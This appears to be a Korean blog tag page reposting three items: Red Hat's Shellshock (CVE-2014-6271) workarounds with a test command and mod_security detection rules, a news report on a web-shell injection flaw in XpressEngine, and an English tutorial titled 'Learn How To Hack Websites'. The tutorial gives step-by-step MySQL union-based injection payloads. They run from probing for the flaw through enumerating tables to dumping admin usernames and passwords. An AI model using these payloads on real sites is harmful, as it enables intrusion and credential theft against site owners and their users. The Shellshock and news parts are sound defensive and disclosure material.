'code injection'에 해당되는 글 3건

  1. 2014.09.25 Bash Vulnerability Code Injection Attack
  2. 2013.05.02 ‘익스프레스 엔진’에 웹쉘코드 삽입 취약점 발견
  3. 2012.06.20 MySQL Injection : Step By Step Tutorial
2014.09.25 14:42

Bash Vulnerability Code Injection Attack


bash_ld_preload.c

#include <sys/types.h>
#include <stdlib.h>
#include <string.h>

static void __attribute__ ((constructor)) strip_env(void);
extern char **environ;

static void strip_env()
{
	char *p,*c;
	int i = 0;
	for (p = environ[i]; p!=NULL;i++ ) {
		c = strstr(p,"=() {");
		if (c != NULL) {
			*(c+2) = '\0';
		}
		p = environ[i];
	} 

}


  • Compile it:
gcc bash_ld_preload.c -fPIC -shared -Wl,-soname,bash_ld_preload.so.1 -o bash_ld_preload.so
  • Copy bash_ld_preload.so to /lib:
cp bash_ld_preload.so /lib/

If you wish to apply this workaround across the entire system:

  • Add the following to /etc/ld.so.preload on a line by itself:
/lib/bash_ld_preload.so
  • Restart all relevant services or reboot the system.

Note that this is potentially very dangerous. It is recommend that you just apply this workaround to specific services that may be exploitable on your system. This can be achieved by adding bash_ld_preload.so to the LD_PRELOAD environment variable in the script that will initialize the service. For example, for httpd on Red Hat Enterprise Linux 6:

  • Add the following two lines at the top of /etc/init.d/httpd, after the #! line:
LD_PRELOAD=/lib/bash_ld_preload.so
export LD_PRELOAD
  • Then restart httpd:
service httpd restart


Workaround: Using mod_security:

The following mod_security rules can be used to reject HTTP requests containing data that may be interpreted by Bash as function definition if set in its environment. They can be used to block attacks against web services, such as attacks against CGI applications outlined above.

Request Header values:

SecRule REQUEST_HEADERS "^\(\) {" "phase:1,deny,id:1000000,t:urlDecode,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"

SERVER_PROTOCOL values:

SecRule REQUEST_LINE "\(\) {" "phase:1,deny,id:1000001,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"

GET/POST names:

SecRule ARGS_NAMES "^\(\) {" "phase:2,deny,id:1000002,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"

GET/POST values:

SecRule ARGS "^\(\) {" "phase:2,deny,id:1000003,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271 - Bash Attack'"

File names for uploads:

SecRule  FILES_NAMES "^\(\) {"  "phase:2,deny,id:1000004,t:urlDecode,t:urlDecodeUni,status:400,log,msg:'CVE-2014-6271  - Bash Attack'"

These may result in false positives but it's unlikely, and they can log them and keep an eye on it. You may also want to avoid logging as this could result in a significant amount of log files.

Workaround: Using IPTables:

A note on using IPTables string matching:

iptables using -m string --hex-string '|28 29 20 7B|'

Is not a good option because the attacker can easily send one or two characters per packet and avoid this signature easily. However, it may provide an overview of automated attempts at exploiting this vulnerability.


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

 vulnerable

 this is a test


$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

 bash: warning: x: ignoring function definition attempt

 bash: error importing function definition for `x'

 this is a test




출처 : access.redhat.com




Trackback 0 Comment 0
2013.05.02 18:40

‘익스프레스 엔진’에 웹쉘코드 삽입 취약점 발견

취약한 버전 사용 시 웹서버 원격제어, 홈페이지 변조 가능


[보안뉴스 김태형] PHP 기반 공개 웹 게시판인 익스프레스 엔진에서 웹쉘코드 삽입 취약점이 발견되어 사용자들의 주의가 필요하다.     

이번 취약점을 발견한 Black Falcon팀은 “국내 PHP기반의 공개 웹 게시판인 익스프레스 엔진에서 웹쉘코드 삽입(Code Injection) 취약점을 발견했다”면서 “이 취약점에 영향을 받는 소프트웨어는 익스프레스 엔진 1.5.4 및 이전 버전이다”라고 설명했다.


취약한 버전을 사용하고 있을 경우, 홈페이지 해킹에 의해 변조, 웹서버 원격제어, 데이터베이스 정보 유출 등의 피해를 입을 수 있으므로 웹 관리자의 빠른 대응 조치가 필요하다.


기존 익스프레스 엔진(1.5.4.3 및 이전) 사용자는 업데이트가 적용된 상위 버전(1.7.3.2 이상) 으로 업그레이드 하고 패치 작업 이전 원본 파일은 백업이 필요하다. 원본 파일 백업의 경우에는 소스 수정으로 인한 프로그램 기능 영향도 평가 및 문제 발생 시 복구를 위해 꼭 필요하다.


한편, 익스프레스 엔진을 새로 설치하는 사용자의 경우 반드시 보안패치가 적용된 최신 버전을 설치해야 한다.


이 취약점은 현재 패치 권고문이 배포된 상태로 홈페이지(https://code.google.com/p/xe-core/wiki/ReleaseNote_1_7_3_2)를 통해 패치를 다운 받을 수 있다.


이번 취약점을 발견한 Black Falcon 팀장은 “이를 악용한 공격이 성공할 경우에 해당 서버를 활용해 내부망 안에 모든 PC를 쉽게 공격할 수 있으므로, 사용자들은 신속히 패치를 적용해 잠재된 위협을 제거해야 한다”고 당부했다.

[김태형 기자(boan@boannews.com)]



출처 : 보안뉴스


Trackback 0 Comment 0
2012.06.20 19:57

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in otherdatabases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1: 

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: 
www.site.com/page=1 

or 
www.site.com/id=5
 

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example: 

www.site.com/page=1' 
If the database is vulnerable, the page will spit out a MySQL error such as; 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. 

Step 2 

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: 

www.site.com/page=1 order by 1-- 
http://www.site.com/page=1 order by 2-- 
http://www.site.com/page=1 order by 3-- 
http://www.site.com/page=1 order by 4-- 
http://www.site.com/page=1 order by 5--
 
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. 

Step 3
 

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, 
for example: 
www.site.com/page=1 union all select 1,2,3,4-- 

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. 

Step 4 

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: 
user() 
database() 
version() 
or if these dont work try... 
@@user 
@@version 
@@database
 

For example the url would look like: 
www.site.com/page=1 union all select 1,user(),version(),4-- 

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. 
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. 

Step 5 

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. 
UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 
So the url would look like: 
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. 

Step 6 
In this Step we want to list all the column names in the database, to do this we use the following command: 

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
 
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- 
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. 

Step 7 

Finally we need to dump the data, so say we want to get the "username" and "password" fields, fromtable "admin" we would use the following command, 
union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website 


출처 : http://www.devilscafe.in/


Trackback 0 Comment 0